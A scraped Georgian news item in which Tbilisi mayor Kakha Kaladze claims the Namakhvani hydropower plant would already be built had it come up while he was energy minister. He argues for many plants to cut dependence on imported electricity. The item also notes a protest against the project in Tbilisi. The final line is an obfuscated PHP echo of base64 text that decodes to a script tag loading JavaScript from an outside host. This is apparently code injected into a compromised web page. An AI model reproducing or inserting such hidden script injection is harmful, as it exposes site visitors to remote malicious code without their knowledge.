celsiusi
ავერსი საქკაბელი
როგორც თბილისის მერმა და ენერგეტიკის ყოფილმა მინისტრმა, კახა კალაძემ განაცხადა, მისი ენერგეტიკის მინისტრობის დროს რომ ყოფილიყო საუბარი ნამახვანჰესზე, უკვე აშენებული იქნებოდა. 
 
დედაქალაქის მერის თქმით, მისი მინისტრობის დროს საქართველოში ყველაზე მეტი ჰესი აშენდა. 
 
„ჩემი პოზიცია არის, რომ რაც შეიძლება ბევრი ჰესი უნდა აშენდეს ქვეყანაში, მაქსიმალურად რაციონალურად უნდა იქნას გამოყენებული რესურსები, რომელიც ქვეყანას გააჩნია იმისთვის, რომ ჩვენი ქვეყნის მოქალაქეები არ ვიყოთ დამოკიდებული რუსეთიდან, აზერბაიჯანიდან, სომხეთიდან და თურქეთიდან შემოტანილ ელექტროენერგიაზე. გრძელვადიან პერსპექტივაში ეს პირდაპირ აისახება ჩვენს ჯიბეზე, რადგან გვიწევს მაღალი ტარიფების გადახდა. როცა მე ენერგეტიკის მინისტრი ვიყავი, მეამაყება, რომ ყველაზე მეტი ჰესი აშენდა, რაც ძალიან მაგარია ქვეყნისთვის“, - განაცხადა კალაძემ. 
 
შეგახსენებთ , რომ ნამახვანჰესის მშენებლობის მოწინააღმდეგეებმა გუშინ თბილისში საპროტესტო აქცია გამართეს. დემონსტრანტთა ნაწილი რეგიონებიდან ჩამოვიდა. აქტივისტების ნაწილმა რესპუბლიკის მოედანზე კარვები გაშალა.  
1374
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");